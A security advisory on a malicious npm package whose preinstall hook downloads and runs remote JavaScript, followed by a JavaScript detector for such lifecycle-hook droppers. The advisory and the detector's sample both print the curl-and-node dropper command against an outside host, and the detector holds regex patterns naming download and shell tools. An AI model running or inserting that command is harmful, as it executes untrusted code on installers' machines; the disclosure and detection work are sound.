MAL-2026-6266
Malicious code in test-package-sajsdkashdj (npm)
Details
## Source: amazon-inspector (62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87)

package.json declares a preinstall lifecycle script: `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On every npm install, the package downloads JavaScript from poc.amanrawat.com and immediately executes it with node under the installer's privileges. The fetched content is unpinned, unhashed, served from a third-party non-publisher domain, and mutable: whoever controls poc.amanrawat.com can ship arbitrary code to every installer at any time. The package itself contains no functionality beyond this dropper. The package name (test-package-sajsdkashdj) and the fetch target (a path named hehe.js on a personal-looking domain) further indicate this is not a legitimate distribution mechanism.
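As an added example (not part of the advisory or of the Amazon Inspector source), the following check flags the pattern described above in a package.json: a lifecycle hook whose command both downloads remote content and executes it. The package.json text is constructed from the advisory's description; the hook names are real npm lifecycle hooks, and the regex heuristics are this example's own.

```javascript
// Lifecycle hooks npm runs automatically during install/publish.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];
// Heuristic: something that fetches over the network ...
const DOWNLOADERS = /\b(curl|wget|Invoke-WebRequest|iwr)\b|https?:\/\//i;
// ... combined with something that runs what was fetched.
const EXECUTORS = /\b(node|sh|bash|zsh|python3?|eval|source)\b|\|\s*(sh|bash)\b/i;
const URL_RE = /https?:\/\/[^\s"'&|;]+/gi;

// Returns one finding per lifecycle hook that both downloads and executes code.
function findRemoteDroppers(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    if (DOWNLOADERS.test(cmd) && EXECUTORS.test(cmd)) {
      const urls = cmd.match(URL_RE) || [];
      findings.push({
        hook,
        command: cmd,
        // Hosts the installer would contact; compare against the publisher's domain.
        hosts: urls.map((u) => new URL(u).hostname),
      });
    }
  }
  return findings;
}

// Constructed sample modelled on the advisory: a preinstall dropper.
const MALICIOUS_PACKAGE_JSON = JSON.stringify({
  name: "test-package-sajsdkashdj",
  version: "1.0.0",
  scripts: { preinstall: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js" },
});

// Constructed benign sample: local build step only, and the URL lives in a
// non-lifecycle script that npm install never runs.
const BENIGN_PACKAGE_JSON = JSON.stringify({
  name: "ok-package",
  version: "2.1.0",
  scripts: { postinstall: "node scripts/patch.js", test: "curl https://example.com/fixture.json" },
});

console.log(JSON.stringify(findRemoteDroppers(MALICIOUS_PACKAGE_JSON), null, 2));
console.log(findRemoteDroppers(BENIGN_PACKAGE_JSON).length); // 0
```

Run it against an installed dependency tree (every node_modules/*/package.json) to surface hooks worth a manual look; the heuristic is a triage aid, not proof of malice.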
Affected packages
No fixed version published yet for test-package-sajsdkashdj (npm). Pin to a known-safe version or switch to an alternative.